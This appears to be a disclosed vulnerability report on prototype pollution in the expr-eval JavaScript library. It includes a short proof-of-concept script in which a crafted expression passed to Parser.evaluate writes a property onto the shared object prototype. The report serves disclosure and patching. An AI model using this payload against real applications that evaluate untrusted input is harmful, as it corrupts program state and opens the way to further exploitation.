Prototype Pollution in silentmatt/expr-eval
Valid
Reported on
Mar 26th 2021
✍️ Description
With speficific input attckers can define properties on prototype, which will lead to prototype pollution.
Need node version>=12.0.0, which introduce Object.fromEntries
🕵️♂️ Proof of Concept
// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted
💥 Impact
This vulnerability is capable of make a prototype pollution
Occurrences
to join this conversation